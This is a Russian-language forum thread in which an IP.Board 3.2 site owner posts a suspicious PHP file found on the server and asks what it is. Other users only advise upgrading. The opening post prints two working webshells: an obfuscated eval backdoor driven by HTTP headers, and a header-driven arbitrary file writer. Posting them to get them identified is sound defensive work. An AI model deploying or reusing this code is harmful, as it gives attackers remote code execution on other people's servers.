EIKA Posted January 5, 2015 Report Share Posted January 5, 2015 (edited) Здравствуйте! Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php. Файл нашел в 2 местах, содержимое отличается: В корне: <?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?> В папке cache: ============================================================================== URL: /index.php/index.php Date: Tue, 20 Nov 2012 10:16:53 +0000 IP Address: 31.3.250.226 Time Taken: 0.04346 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?> ============================================================================== ============================================================================== ========================= END =================================== ========================= /index.php? =================================== ============================================================================== IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил. Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер. Внимание, вопросы: 1. Что это такое? 2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)? 3. Что оно делало? Точная версия борды: IP.Board Version 3.2.0 (ID:32003) Edited January 5, 2015 by EIKA Quote Link to comment Share on other sites More sharing options...
SanyaSamp Posted January 5, 2015 Report Share Posted January 5, 2015 Обновись до 3.4.6 Quote Link to comment Share on other sites More sharing options...
WOLF Posted January 5, 2015 Report Share Posted January 5, 2015 Обновись до 3.4.6 бессмысленные посты не нужно писать. Quote Link to comment Share on other sites More sharing options...
SanyaSamp Posted January 5, 2015 Report Share Posted January 5, 2015 бессмысленные посты не нужно писать. Почему бессмысленные? IPB 3.2 забита уязвимостями Quote Link to comment Share on other sites More sharing options...
WOLF Posted January 5, 2015 Report Share Posted January 5, 2015 Почему бессмысленные? IPB 3.2 забита уязвимостями ТС спрашивает о файле, а не о том, как защитится. Quote Link to comment Share on other sites More sharing options...
EIKA Posted January 5, 2015 Author Report Share Posted January 5, 2015 Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.